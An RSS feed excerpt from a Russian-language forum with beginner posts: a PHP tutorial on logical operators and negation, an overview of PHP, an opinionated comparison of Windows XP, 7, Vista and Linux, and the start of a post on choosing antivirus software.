						&lt;p&gt;&amp;#160; &amp;#160; &amp;lt;?php&lt;br /&gt;&amp;#160; &amp;#160; &amp;#160; &amp;#160;$flag1 = true;&lt;br /&gt;&amp;#160; &amp;#160; &amp;#160; &amp;#160;$flag2 = true;&lt;br /&gt;&amp;#160; &amp;#160; &amp;#160; &amp;#160;$flag3 = false;&lt;br /&gt;&amp;#160; &amp;#160; &amp;#160; &amp;#160;if( $flag1 &amp;amp;&amp;amp; $flag2 || $flag3)&lt;br /&gt;&amp;#160; &amp;#160; &amp;#160; &amp;#160;{&lt;br /&gt;&amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; echo &amp;quot;&amp;lt;p&amp;gt;Условие истинно&amp;lt;p&amp;gt;&amp;quot;;&lt;br /&gt;&amp;#160; &amp;#160; &amp;#160; &amp;#160;}&lt;br /&gt;&amp;#160; &amp;#160; &amp;#160; &amp;#160;else&lt;br /&gt;&amp;#160; &amp;#160; &amp;#160; &amp;#160;{&lt;br /&gt;&amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; echo &amp;quot;&amp;lt;p&amp;gt;Условие ложно&amp;lt;p&amp;gt;&amp;quot;;&lt;br /&gt;&amp;#160; &amp;#160; &amp;#160; &amp;#160;}&lt;br /&gt;&amp;#160; &amp;#160; ?&amp;gt;&lt;/p&gt;
						&lt;p&gt;Результатом будет вывод фразы «Условие истинно», так как согласно приоритету исполнения сначала выполняется оператор &amp;amp;&amp;amp;, так как оба флага равны true – возвращается true, затем это выражение сравнивается с $flag3 (true || $flag3) – что возращает тоже true, так как одно из сравниваемых равно true.&lt;/p&gt;
						&lt;p&gt;Если же мы запишем&lt;/p&gt;
						&lt;p&gt;&amp;#160; &amp;#160; &amp;lt;?php&lt;br /&gt;&amp;#160; &amp;#160; &amp;#160; &amp;#160;$flag1 = true;&lt;br /&gt;&amp;#160; &amp;#160; &amp;#160; &amp;#160;$flag2 = true;&lt;br /&gt;&amp;#160; &amp;#160; &amp;#160; &amp;#160;$flag3 = false;&lt;br /&gt;&amp;#160; &amp;#160; &amp;#160; &amp;#160;if($flag1 &amp;amp;&amp;amp; ($flag2 &amp;amp;&amp;amp; $flag3))&lt;br /&gt;&amp;#160; &amp;#160; &amp;#160; &amp;#160;{&lt;br /&gt;&amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; echo &amp;quot;&amp;lt;p&amp;gt;Условие истинно&amp;lt;p&amp;gt;&amp;quot;;&lt;br /&gt;&amp;#160; &amp;#160; &amp;#160; &amp;#160;}&lt;br /&gt;&amp;#160; &amp;#160; &amp;#160; &amp;#160;else&lt;br /&gt;&amp;#160; &amp;#160; &amp;#160; &amp;#160;{&lt;br /&gt;&amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; echo &amp;quot;&amp;lt;p&amp;gt;Условие ложно&amp;lt;p&amp;gt;&amp;quot;;&lt;br /&gt;&amp;#160; &amp;#160; &amp;#160; &amp;#160;}&lt;br /&gt;&amp;#160; &amp;#160; ?&amp;gt;&lt;/p&gt;
						&lt;p&gt;результатом будет «Условие ложно».&lt;/p&gt;
						&lt;p&gt;Вообще программисты не любят запоминать порядок приоритетов, поэтому для того чтобы Ваш код легко читался (в том числе и Вами) лучше всегда использовать скобки. Т.е. в первом скрипте лучше записать if(($flag1 &amp;amp;&amp;amp; $flag2) || $flag3) – тогда сразу становиться понятно, что имеется ввиду.&lt;/p&gt;
						&lt;p&gt;Иногда нужно проверить условие безальтернативно, например, на ложность или истинность. Допустим, функция (func()) возвращает истину или ложь и в зависимости от этого нужно вывести на страничку те или иные теги. Например, функция mysql_query($query) – возвращает true если запрос к базе данных mySQL, размещённый в строке $query успешно выполнился и false – в противном случае.&lt;/p&gt;
						&lt;p&gt;Если Вам нужно среагировать только на удачное обращение, Вы можете записать:&lt;/p&gt;
						&lt;p&gt;&amp;#160; &amp;#160; &amp;lt;?php&lt;br /&gt;&amp;#160; &amp;#160; &amp;#160; &amp;#160;if(mysql_query($query))&lt;br /&gt;&amp;#160; &amp;#160; &amp;#160; &amp;#160;{&lt;br /&gt;&amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; echo &amp;quot;&amp;lt;p&amp;gt;Данные успешно занесены в базу данных.&amp;lt;p&amp;gt;&amp;quot;;&lt;br /&gt;&amp;#160; &amp;#160; &amp;#160; &amp;#160;}&lt;br /&gt;&amp;#160; &amp;#160; ?&amp;gt;&lt;/p&gt;
						&lt;p&gt;Если Вам нужно среагировать только на не удачные обращения, Вы, конечно, можете записать:&lt;/p&gt;
						&lt;p&gt;&amp;#160; &amp;#160; &amp;lt;?php&lt;br /&gt;&amp;#160; &amp;#160; &amp;#160; &amp;#160;if(mysql_query($query))&lt;br /&gt;&amp;#160; &amp;#160; &amp;#160; &amp;#160;{}&lt;br /&gt;&amp;#160; &amp;#160; &amp;#160; &amp;#160;else&lt;br /&gt;&amp;#160; &amp;#160; &amp;#160; &amp;#160;{&lt;br /&gt;&amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; echo&amp;quot;&amp;lt;p&amp;gt;Данные не были занесены в базу данных.&amp;lt;p&amp;gt;&amp;quot;;&lt;br /&gt;&amp;#160; &amp;#160; &amp;#160; &amp;#160;}&lt;br /&gt;&amp;#160; &amp;#160; ?&amp;gt;&lt;/p&gt;
						&lt;p&gt;Но это не элегантный, запутывающий способ – здесь самое время воспользоваться оператором отрицания: !, применение которого к переменной меняет её значение с true на false, а false на true:&lt;/p&gt;
						&lt;p&gt;&amp;#160; &amp;#160; &amp;lt;?php&lt;br /&gt;&amp;#160; &amp;#160; &amp;#160; &amp;#160;if(!mysql_query($query))&lt;br /&gt;&amp;#160; &amp;#160; &amp;#160; &amp;#160;{&lt;br /&gt;&amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; echo&amp;quot;&amp;lt;p&amp;gt;Данные не были занесены в базу данных.&amp;lt;p&amp;gt;&amp;quot;;&lt;br /&gt;&amp;#160; &amp;#160; &amp;#160; &amp;#160;}&lt;br /&gt;&amp;#160; &amp;#160; ?&amp;gt;&lt;/p&gt;</description>
			<author>mybb@mybb.ru (SMOKED)</author>
			<pubDate>Sun, 06 Feb 2011 21:44:33 +0300</pubDate>
			<guid>https://xakerzone.bbeasy.ru/viewtopic.php?pid=12#p12</guid>
		</item>
		<item>
			<title>что такое php??</title>
			<link>https://xakerzone.bbeasy.ru/viewtopic.php?pid=11#p11</link>
			<description>&lt;p&gt;PHP (Hypertext Preprocessor - Препроцессор Гипертекста)– это широко используемый язык сценариев общего назначения с открытым исходным кодом.&lt;/p&gt;
						&lt;p&gt;PHP - язык программирования, специально разработанный для написания web-приложений (скриптов, сценариев), исполняющихся на Web-сервере. Синтаксис языка во многом основывается на синтаксисе C, Java и Perl. Он очень похож на С и на Perl, поэтому для профессионального программиста не составит труда его изучить. С другой стороны, язык PHP проще, чем C, и его может освоить веб-мастер, не знающий пока других языков программирования.&lt;/p&gt;
						&lt;p&gt;Огромным плюсом PHP, в отличие от, например, JavaScript, является то, что PHP-скрипты выполняются на стороне сервера. PHP не зависит от скорости компьютера пользователя или его браузера, он полностью работает на сервере. Пользователь даже может не знать, получает ли он обычный HTML-файл или результат выполнения скрипта.&lt;/p&gt;
						&lt;p&gt;Сценарии на языке PHP могут исполняться на сервере в виде отдельных файлов, а могут интегрироваться в html страницы.&lt;/p&gt;
						&lt;p&gt;PHP способен генерировать и преобразовывать не только HTML документы, но и изображения разных форматов - JPEG, GIF, PNG, файлы PDF и FLASH. PHP способен формировать данные в любом текстовом формате, включая XHTML и XML.&lt;/p&gt;
						&lt;p&gt;PHP - кроссплатформенная технология. Дистрибутив PHP доступен для большинства операционных систем, включая Linux, многие модификации Unix, Microsoft Windows, Mac OS и многих других. PHP поддерживается на большинстве вебсерверов, таких, как Apache, Microsoft Internet Information Server (IIS), Microsoft Personal Web Server и других.&lt;/p&gt;
						&lt;p&gt;Для большинства серверов PHP поставляется в 2-х вариантах - в качестве модуля и в качестве CGI препроцессора.&lt;/p&gt;
						&lt;p&gt;PHP поддерживает работу с ODBC и большое количество баз данных: MySQL, MSQL, Oracle, PostgreSQL, SQLite и др.&lt;/p&gt;
						&lt;p&gt;Язык программирования PHP, особенно в связке с популярнейшей базой данных MySQL - оптимальный вариант для создания интернет-сайтов различной сложности.&lt;/p&gt;
						&lt;p&gt;Язык PHP постоянно совершенствуется, и ему наверняка обеспечено долгое доминирование в области языков web -программирования.&lt;/p&gt;</description>
			<author>mybb@mybb.ru (SMOKED)</author>
			<pubDate>Sun, 06 Feb 2011 21:36:38 +0300</pubDate>
			<guid>https://xakerzone.bbeasy.ru/viewtopic.php?pid=11#p11</guid>
		</item>
		<item>
			<title>а вы задавали себе вопрос,какя же операционная система лучше?</title>
			<link>https://xakerzone.bbeasy.ru/viewtopic.php?pid=10#p10</link>
			<description>&lt;p&gt;на данный момент,мое личное мнение что самая лучшая операционка это по прежнему windows xp и это без сомнений,но как таково эти вещи судят более разумные люди нежеле чем я.....&lt;br /&gt;Данный вопрос заинтересовал всех нас, на многих форумах не затихает опросы о лучших ОС , и всех нас интересует какая ОС лучшая ?&lt;/p&gt;
						&lt;p&gt;Лучшая операционная система считается не та которая только вышла , а та которой пользуется пользователи.&lt;/p&gt;
						&lt;p&gt;В последнее время вышла последняя ОС windows 7, которая славиться всем ,быстротой и работой , эта система продавалась по 2 копии за минуту и по прогнозам за 2010 год стала лучшей ОС, давайте теперь посмотрим так ли это на самом деле, лучшая считается не та которую рекламируют&amp;#160; а та которую пользуются и выбирает народ.&lt;/p&gt;
						&lt;p&gt;Результаты опроса за 2010 год ‘Какой операционной системой пользуетесь’&lt;/p&gt;
						&lt;p&gt;Опрос Лучшая система не затухала целый год и вот к вашему вниманию лучшая ОС&lt;/p&gt;
						&lt;p&gt;Если вы еще не знаете что такое ОС –это ОПЕРАЦИОННАЯ СИСТЕМА – программа, управляющая аппаратными и программными средствами компьютера, которые предназначены для выполнения задач пользователя.&lt;/p&gt;
						&lt;p&gt;Представление о том, что такое операционная система, менялось со временем. Первые компьютеры использовались только для решения математических задач, а программами служили написанные в машинных кодах вычислительные алгоритмы. Программисту при кодировании программ приходилось самостоятельно управлять компьютером и обеспечивать выполнение своей программы. Со временем для облегчения процесса написания программ был создан набор служебных программ. С развитием электроники аппаратура совершенствовалась и появилась возможность одновременного выполнения нескольких программ, в связи с этим были созданы алгоритмы переключения заданий. Набор подпрограмм, обеспечивающих переключение, назывался монитором или супервизором. Однако, возникла проблема прерывания работы программ, содержащих ошибки и потребляющих ресурсы компьютера (например, постоянно занимающих процессор или ошибочно записывающих результаты своей работы в оперативную память, где размещаются другие программы). Выход был найден в создании специальных аппаратных механизмов, защищающих память программ от случайного доступа со стороны других программ. Поскольку управление этими механизмами уже нельзя было включать в сами программы, к монитору была добавлена специальная программа, управляющая защитой памяти. Так был создан резидентный монитор. Последовательное решение подобных проблем было направлено на создание универсальной ЭВМ, способной решать одновременно разнообразные задачи.&lt;/p&gt;
						&lt;p&gt;По опросу лучшая операционная система 2010&lt;br /&gt;1 На первой позиции стоит Windows XP, это самая удачная версия со всех операционных систем Windows, и она считаеться одна из лучших не смотря что вышла новая ОС Windows 7 , Хотя XP является долгожителем рынка ОС, она не собирается с него уходить. В действительности она по-прежнему сохраняет сильные позиции многие из нас привыкли к этой системе и не смотря на выход новой ОС Windows 7 еще пока не переходим, хотя по словам что Windows XP вскоре будет и снята с производства не не будет она забыта&lt;/p&gt;
						&lt;p&gt;56 % пользователей со всего мира пользуються операционной системой Windows XPWindows XP -&amp;#160; ОС компании Microsoft - наиболее плодотворная попытка Microsoft объединить преимущества семейств 9x/Me и NT/2000: мультимедийность и простоту работы, с одной стороны, и надежность и стабильность, с другой. И, судя по всему, это ей наконец удалось. По словам самой Microsoft: &amp;quot;Windows XP - не просто апгрейд Windows, это - апгрейд стиля жизни&amp;quot; Хотя официальные системные требования и не кажутся слишком завышеннми, для более-менее комфортной работы понадобится процессор не менее 500 МГц и не менее 128 Мб оперативной памяти. Но, если пожертвовать всякими &amp;quot;примочками&amp;quot; и визуальными эффектами, то вполне комфортно можно будет работать и на менее мощных системах.&lt;/p&gt;
						&lt;p&gt;На данный момент лучшая операционка это Windows XP, хотя многие и считают что Windows 7лучше и быстрее но пока Windows XP остаеться лучшей&lt;/p&gt;
						&lt;p&gt;2 На второй позиции новая ОС Windows 7&lt;/p&gt;
						&lt;p&gt;30% пользователей ОС пользуються Windows 7&lt;/p&gt;
						&lt;p&gt;Она превосходит от&amp;#160; Windows XP всем , и дизайном и быстротой работы&lt;/p&gt;
						&lt;p&gt;ОС Windows 7 по моему мнение она будет лидером на первом месте но это будет не так и скоро как хотелось&lt;/p&gt;
						&lt;p&gt;ОС Windows 7 была разработана с учетом отзывов пользователей и включает в себя множество крупных и мелких усовершенствований. Aero Peek, запись телепередач, возможность создавать домашнюю группу в домашней сети - Windows 7 упрощает работу с ПК и позволяет легко устанавливать с его помощью связь со всем миром.&lt;br /&gt;Девять отличий Windows 7 от Windows XP&lt;/p&gt;
						&lt;p&gt;Windows XP. Запускать не очень удобно, работает медленно.&lt;/p&gt;
						&lt;p&gt;Windows 7. Вы еще не закончили вводить искомое слово в поле поиска стандартного Проводника, а результаты уже перед вами. Нужное слово «подсвечено» и приведен фрагмент содержимого, в котором оно нашлось. Вы выделяете документ и видите тут же, в области просмотра самого Проводника, его содержимое, причем неважно, документ ли это Microsoft Office (Разумеется требуется установленный пакет Microsoft Office), фотография из отпуска или видеоклип.&lt;/p&gt;
						&lt;p&gt;Итог. В Windows 7 поиск происходит заметно быстрее благодаря тому, что система сама заранее просматривает файлы и запоминает, где какое слово встречается. Это позволяет за несколько мгновений находить нужные документы, письма, ссылки, фотографии или музыку.&lt;/p&gt;
						&lt;p&gt;Комментарий Как известно поиском в Windows 7 заведует служба Windows Search. Да, без сомнения поиск стал быстрее, но дело в том, что вышеприведенная служба работает в фоновом режиме, постоянно отнимая системные ресурсы на создание поискового индекса. На наш взгляд лучшим инструментом для поиска является функция популярного файлового менеджера Total Commander.&lt;/p&gt;
						&lt;p&gt;2. Запуск программ&lt;/p&gt;
						&lt;p&gt;Windows XP. Входим в меню «Пуск», потом «Стандартные&amp;quot;, потом, кажется, «Служебные» или нет… Нужно помнить, где находится программа! Половина экрана загорожена развернутыми окнами, а нужная программа так и не видна!&lt;/p&gt;
						&lt;p&gt;Windows 7. Нажимаете круглую кнопку меню «Пуск» («шарик с флажком»), вводите первые буквы «каль…» и вот он, калькулятор. Осталось нажать «Ввод» или щелкнуть по нему мышкой.&lt;/p&gt;
						&lt;p&gt;Итог. Достаточно ввести первые буквы названия искомой программы в меню «Пуск» и она перед вами!&lt;/p&gt;
						&lt;p&gt;Комментарий Интересно, многие будут запускать программы подобным образом? Для того, чтобы запустить калькулятор или другую программу, можно использовать ярлыки или горячие клавиши.&lt;/p&gt;
						&lt;p&gt;3. Использование мультимедийных возможностей&lt;/p&gt;
						&lt;p&gt;Windows XP. Фотографии и фильмы выводятся на монитор, подключиться к большой «панели» сложно. Управление - только с помощью мышки.&lt;/p&gt;
						&lt;p&gt;Windows 7. Вы на любимом диване, у вас в руках пульт дистанционного управления и вы легко пролистываете снимки, просматриваете видео или наслаждаетесь своей фонотекой на экране жидкокристаллического или плазменного телевизора. Компьютер выполняет функции и плеера, и видеомагнитофона. (Для реализации такой возможности нужен совместимый ТВ-тюнер с пультом ДУ).&lt;/p&gt;
						&lt;p&gt;Итог. В основную домашнюю редакцию Windows 7 входит Windows Media Center, который позволит вам легко настроить подключение вашего компьютера к внешнему экрану и превратит его в центр домашних развлечений, в котором музыка, фотографии, телепередачи и видеозаписи одинаково легко доступны.&lt;/p&gt;
						&lt;p&gt;Комментарий Никаких проблем в подключении большого телевизора в Windows XP не возникало и возникнуть не могло, прекрасно работало подключение как по HDMI так и с помощью «бананов» или скарта. То что касается пульта, то Windows Media Center не опознал мое устройство, как впрочем и большинство других. К сожалению медиацентр имеет поддержку ограниченного количества устройств и список этот расширить не представляется возможным. Существует программа стороннего производителя, которая называется Mediaportal, и прекрасно работает как Windows XP, так и в Windows 7. К слову намного функциональней, удобней и поддерживает огромное количество устройств.&lt;/p&gt;
						&lt;p&gt;4. Создание домашней сети&lt;/p&gt;
						&lt;p&gt;Windows XP. Много окошек и кнопок, нужно быть большим знатоком, чтобы расставить галочки в нужных местах и ввести IP-адреса… А тут еще нужно подключить общий принтер...&lt;/p&gt;
						&lt;p&gt;Windows 7. Вы выбрали тип сети «Домашняя». Дальше Windows 7 сама все настроила, создала «Домашнюю группу» и предложила записать ее пароль. Вам осталось решить, чем вы хотите «поделиться»: фотографиями, музыкой, видео. документами или подключенным к данному компьютеру принтером. Другой компьютер при подключении к сети обнаружит «Домашнюю группу», вы введете пароль и… вот вы уже слушаете музыку с другого ПК и печатаете на «его» принтере.&lt;/p&gt;
						&lt;p&gt;Итог. В Windows 7 удобная автоматическая настройка «Домашней группы», единственный пароль для всех и всего несколько щелчков, определяющих, какими файлами вы хотите поделиться с другими пользователями в вашей семье.&lt;/p&gt;
						&lt;p&gt;Комментарий Возможно удобно для новичков, но для продвинутых пользователей лишняя обуза.&lt;/p&gt;
						&lt;p&gt;5. Родительский контроль&lt;/p&gt;
						&lt;p&gt;Windows XP. Вы купили компьютер для ребенка, рассчитывая, что он поможет ему в учебе. А оказалось, что он играет в неподходящие его возрасту игры, залезает в папины программы, бродит по не самым чистоплотным сайрам Интернета. Что делать? Заводить для него собственную учетную запись, ограничивая права доступа! А как? Это по силу только продвинутому администратору.&lt;/p&gt;
						&lt;p&gt;Windows 7. Настраиваете «Родительский контроль», указываете какие игры доступны ребенку, какие программы он сможет использовать и, главное, вы ограничиваете тут же продолжительность нахождения за компьютером. Причем, для каждого дня недели отдельно он сможет проводить за ПК в каждый день недели.&lt;/p&gt;
						&lt;p&gt;Итог. «Родительский контроль» позволяет создать список игр и программ, которые ребенок сможет запускать («все, что не разрешено – запрещено») и просто ввести ограничения на время, отводимое на компьютер.&lt;/p&gt;
						&lt;p&gt;Комментарий Как родитель двух детей полностью одобряю это нововведение, это действительно необходимая функция операционной системы.&lt;/p&gt;
						&lt;p&gt;6. Работа с файлами и папками&lt;/p&gt;
						&lt;p&gt;Windows XP. Вы храните музыку в разных папках или на разных дисках... И всякий раз вспоминаете, где разместили последний скаченный альбом.&lt;/p&gt;
						&lt;p&gt;Windows 7. Вы один раз добавляете папку с любого подключенного диска в библиотеку и можете забыть, где она находится. В любом Проводнике щелкните Библиотека &amp;gt; Музыка и вы увидите всю музыкальную коллекцию, со всех дисков. Причем, ее тут же можно отсортировать и, например, запустить проигрывание хитов вашей любимой группы, даже, если ее альбомы физически раскиданы по разным дискам. Вы также можете отсортировать фотографии в библиотеке по дате создания, и показать гостям самые свежие снимки, при том, что они будут лежать в различных папках.&lt;/p&gt;
						&lt;p&gt;Итог. Быстрый поиск и удобная сортировка файлов, находящихся при этом в разных уголках вашего винчестера.&lt;/p&gt;
						&lt;p&gt;Комментарий. Слова «удобство» и «быстрота» никогда не будут относится к проводнику Windows. Для работы с файлами нужно использовать FAR или Total Commander.&lt;/p&gt;
						&lt;p&gt;7. Исправление ошибок&lt;/p&gt;
						&lt;p&gt;Windows XP. Не работает принтер? Не удается выйти в Интернет? Ищущем, как решить проблему по справке. Но там ответа нет. Или написано так, что с первого раза не поймешь... Придется в очередной раз звать специалиста.&lt;/p&gt;
						&lt;p&gt;Windows 7. Встроены готовые алгоритмы устранения самых типичных неполадок: сбоев при подключении к Интернету, проблем с принтерами и другими устройствами или, к примеру, отсутствием звука в колонках. Диагностику и устранение возникших сложностей вы можете инициировать сами, но чаще их запустит сама система. Сама увидит проблему, сама начнет поиск решения и сама ее устранит!&lt;/p&gt;
						&lt;p&gt;Итог. «Устранение неполадок» - функция операционной системы, которая решает множество часто встречающихся проблем автоматически или с минимальным вашим участием.&lt;/p&gt;
						&lt;p&gt;Комментарий Несколько раз пытался использовать эту функцию, результат – «Windows не смог устранить причину неисправности, открыть справку?».&lt;/p&gt;
						&lt;p&gt;8. Путешествовать по Интернету&lt;/p&gt;
						&lt;p&gt;Windows XP. Вы встретили на веб-странице незнакомое слово на иностранном языке, копируете его, вводите в другом окне адрес сайта с переводчиком, нажали на кнопку «Перевод». Не слишком-то удобно.&lt;/p&gt;
						&lt;p&gt;Windows 7. Выделили слово, появилась синяя кнопка, выбрали сайт перевод – и в тут же в окошке увидели значение слова на родном языке. Так работают «Ускорители» в Internet Explorer 8. Новый браузер это еще и быстрый поиск, предлагающий вам готовую формулировку запроса и миниатюрные «Веб-фрагменты» сайтов, доступные вам прямо под адресной строкой, всегда готовые поделиться информацией и не требующие от вас ничего для этого, кроме одного щелчка мыши. Итог. Быстрый доступ прямо со страницы к картам, словарям, переводчикам и поиску по выделенным словам. «Веб-фрагменты», которые сами регулярно обновляются. Режим InPrivate стирает все следы вашего «веб-серфинга» после закрытия браузера. И многое другое – в новом Internet Explorer 8.&lt;/p&gt;
						&lt;p&gt;Комментарий Специально посмотрел статистику, какими браузерами пользуются посетители нашего сайта. Отмечу, что более 80% аудитории использует Windows 7. MS Internet Explorer 198, Opera 1421, Mozilla 834 очевидно, что большинство использует браузеры сторонних производителей.&lt;/p&gt;
						&lt;p&gt;9. Использовать рабочий стол&lt;/p&gt;
						&lt;p&gt;Windows XP. Рабочий стол – только для иконок. Для того, чтобы посмотреть погоду – вам нужно открывать специализированный сайт. Хотите взглянуть календарь? Да, он скрывается где-то там, около часов. Обои статичны через неделю уже не радуют.&lt;/p&gt;
						&lt;p&gt;Windows 7. В любом месте рабочего стола вы можете разместить гаджеты: погода, курс валют, календарь и разнообразные часы – просто и наглядно. Там же можно «приклеить» «записки», которые очень похожи на настоящие, но точно никуда не улетят.А обои рабочего стола теперь могут меняться в виде плавного и красочного слайд-шоу.&lt;/p&gt;
						&lt;p&gt;Итог. В Windows 7. Отличные гаджеты в комплекте плюс возможность выбрать еще из сотен вариантов доступных бесплатно на специальном сайте: от новостей и биржевых сводок, до онлайн-радио и игрушек. Разноцветные записки с напоминаниями, которые также «крепятся» на рабочий стол. И великолепный набор встроенных тем оформления, включающий в себя фотографии, иллюстрации, звуки и даже набор обоев с видами России.&lt;/p&gt;
						&lt;p&gt;Комментарий. Здесь нечего добавить, визуальное оформление Windows 7 на высочайшем уровне. Действительно работать в среде Windows 7 намного приятней.&lt;/p&gt;
						&lt;p&gt;Подводя итог, хочется сказать, что Windows 7 действительно очень добротный продукт,&lt;br /&gt;Системные требования ОС Windows 7&lt;/p&gt;
						&lt;p&gt;Ниже приведены необходимые условия для запуска ОС Windows 7 на ПК:&lt;/p&gt;
						&lt;p&gt;&amp;#160; &amp;#160; * 32-разрядный (x86) или 64-разрядный (x64) процессор 1 ГГц&lt;br /&gt;&amp;#160; &amp;#160; * 1 гигабайт (ГБ) (для 32-разрядной системы) или 2 ГБ (для 64-разрядной системы) оперативной памяти (RAM);&lt;br /&gt;&amp;#160; &amp;#160; * 16 гигабайт (ГБ) (для 32-разрядной системы) или 20 ГБ (для 64-разрядной системы) на жестком диске;&lt;br /&gt;&amp;#160; &amp;#160; * графическое устройство DirectX 9 с драйвером WDDM версии 1.0 или выше.&lt;br /&gt;&amp;#160; &amp;#160; *&amp;#160; &amp;#160;&lt;/p&gt;
						&lt;p&gt;3 На третьей позиции Операционная система Windows Vista&lt;/p&gt;
						&lt;p&gt;Лишь 6 процентов пользуться ОС Windows Vista&lt;/p&gt;
						&lt;p&gt;Windows Vista очень многие не довольны она очень много требует оперативной памяти и мягко говоря тормозит во многих аспектах.&lt;/p&gt;
						&lt;p&gt;Краткое описание&lt;/p&gt;
						&lt;p&gt;Windows Vista – это последняя версия Microsoft Windows, из серии графических операционных систем для персональных компьютеров, используется как для домаия о ее разработке 22 июля 2005, Vista была известна как Longhorn. 8 ноября 2006, разработка Windows Vista была завершена и версия вышла в продажу. За следующие два месяца вышла последняя версия для MSDN, TechNet Плюс и TechNet, прямых покупателей, производителей компьютерного программного обеспечения и комплектующих, и заказчиков лицензионных программ. 30 января 2007, программа была представлена широкой публике во всем мире, и стала доступной для закупки и загрузке с вебсайта Microsoft. Прошло больше чем пять лет после выпуска Windows XP, его предшественника, что стало наибольшим промежутком времени между двумя версиями Windows.&lt;br /&gt;Microsoft утверждает, что Windows Vista содержит сотни новых свойств ; некоторые из наиболее значительных включают обновленный графический пользовательский интерфейс, и визуальный стиль напоминает Windows Aero, улучшенные поисковые возможности, новые мультимедийные инструменты записи типа Windows DVD Maker, и полностью перепроектировал организацию работу сети, аудио, печати, и подсистемы дисплея. Vista также стремится увеличивать уровень связи между устройствами в домашней сети, используя технологию соединения равноправных узлов ЛВС, облегчая распределение файлов и цифровой информации между компьютерами и устройствами. Для разработчиков, Vista представляет версию 3.0 .NET Framework, которая значительно облегчает работу по написанию высококачественных приложений, чем на традиционным Windows API.&lt;/p&gt;
						&lt;p&gt;так и для работы. До объявлен&lt;br /&gt;&lt;br /&gt; &lt;/p&gt;
						&lt;p&gt;Windows Vista будет забыта&lt;/p&gt;
						&lt;p&gt;Выпуская Windows 7, Microsoft стремится откреститься от Vista. Она не желает напоминать частным и корпоративным пользователям о проблемах, вызванных ее последней ОС. Если Windows 7 добьется того успеха, на который рассчитывает Балмер, Microsoft сможет вычеркнуть из своей истории главу, связанную с Vista.&lt;/p&gt;
						&lt;p&gt;4 позиция ОС Linux/Unix&lt;/p&gt;
						&lt;p&gt;Линуксом пользуются лишь 3%&lt;/p&gt;
						&lt;p&gt;Хотя и все говорят что эта система лучшая со всех , но мало кто переходит на Линукс,лучшая по тому что бесплатная не надо антивирусов, брандмазуров,антишпионов, и под линукс программы идут специально разработанные, если вы пользувались Windows XP то эти проги не подойдут на Линукс, Линукс она работает и на слабых машинах и красивое оформление с ubuntu&lt;/p&gt;
						&lt;p&gt;Linux (&amp;quot;Линукс&amp;quot;) - это современная операционная система, создаваемая независимыми разработчиками по всему миру. Под управлением Linux работают самые разные электронные системы - начиная от обычных персональных компьютеров, мобильных телефонов, ноутбуков и заканчивая многопроцессорными промышленными серверами, кластерными вычислительными комплексами.&lt;/p&gt;</description>
			<author>mybb@mybb.ru (SMOKED)</author>
			<pubDate>Sun, 06 Feb 2011 21:20:55 +0300</pubDate>
			<guid>https://xakerzone.bbeasy.ru/viewtopic.php?pid=10#p10</guid>
		</item>
		<item>
			<title>а вы задавали себе вопрос,какя же операционная система лучше?</title>
			<link>https://xakerzone.bbeasy.ru/viewtopic.php?pid=9#p9</link>
			<description>&lt;p&gt;на данный момент,мое личное мнение что самая лучшая операционка это по прежнему windows xp и это без сомнений,но как таково эти вещи судят более разумные люди нежеле чем я.....&lt;br /&gt;Данный вопрос заинтересовал всех нас, на многих форумах не затихает опросы о лучших ОС , и всех нас интересует какая ОС лучшая ?&lt;/p&gt;
						&lt;p&gt;Лучшая операционная система считается не та которая только вышла , а та которой пользуется пользователи.&lt;/p&gt;
						&lt;p&gt;В последнее время вышла последняя ОС windows 7, которая славиться всем ,быстротой и работой , эта система продавалась по 2 копии за минуту и по прогнозам за 2010 год стала лучшей ОС, давайте теперь посмотрим так ли это на самом деле, лучшая считается не та которую рекламируют&amp;#160; а та которую пользуются и выбирает народ.&lt;/p&gt;
						&lt;p&gt;Результаты опроса за 2010 год ‘Какой операционной системой пользуетесь’&lt;/p&gt;
						&lt;p&gt;Опрос Лучшая система не затухала целый год и вот к вашему вниманию лучшая ОС&lt;/p&gt;
						&lt;p&gt;Если вы еще не знаете что такое ОС –это ОПЕРАЦИОННАЯ СИСТЕМА – программа, управляющая аппаратными и программными средствами компьютера, которые предназначены для выполнения задач пользователя.&lt;/p&gt;
						&lt;p&gt;Представление о том, что такое операционная система, менялось со временем. Первые компьютеры использовались только для решения математических задач, а программами служили написанные в машинных кодах вычислительные алгоритмы. Программисту при кодировании программ приходилось самостоятельно управлять компьютером и обеспечивать выполнение своей программы. Со временем для облегчения процесса написания программ был создан набор служебных программ. С развитием электроники аппаратура совершенствовалась и появилась возможность одновременного выполнения нескольких программ, в связи с этим были созданы алгоритмы переключения заданий. Набор подпрограмм, обеспечивающих переключение, назывался монитором или супервизором. Однако, возникла проблема прерывания работы программ, содержащих ошибки и потребляющих ресурсы компьютера (например, постоянно занимающих процессор или ошибочно записывающих результаты своей работы в оперативную память, где размещаются другие программы). Выход был найден в создании специальных аппаратных механизмов, защищающих память программ от случайного доступа со стороны других программ. Поскольку управление этими механизмами уже нельзя было включать в сами программы, к монитору была добавлена специальная программа, управляющая защитой памяти. Так был создан резидентный монитор. Последовательное решение подобных проблем было направлено на создание универсальной ЭВМ, способной решать одновременно разнообразные задачи.&lt;/p&gt;
						&lt;p&gt;По опросу лучшая операционная система 2010&lt;/p&gt;</description>
			<author>mybb@mybb.ru (SMOKED)</author>
			<pubDate>Sun, 06 Feb 2011 21:19:39 +0300</pubDate>
			<guid>https://xakerzone.bbeasy.ru/viewtopic.php?pid=9#p9</guid>
		</item>
		<item>
			<title>какой же антивирус лучше???</title>
			<link>https://xakerzone.bbeasy.ru/viewtopic.php?pid=8#p8</link>
			<description>&lt;p&gt;На странице –&amp;#160; &amp;#160; &amp;#160;Разработчики и производители антивирусных программ представлены наиболее популярные компании, поставляющие огромное количество антивирусных продуктов. На сегодняшний день в списке представлено более 45 таких фирм. Если принять во внимание, что каждая предлагает, как минимум, три антивирусных продукта то, общее количество антивирусных средств защиты переваливает далеко за сотню. Какой из представленных антивирусов является лучшим? Как выбрать&amp;#160; &amp;#160; &amp;#160;оптимальный антивирус&amp;#160; для Вашего компьютера?&lt;/p&gt;
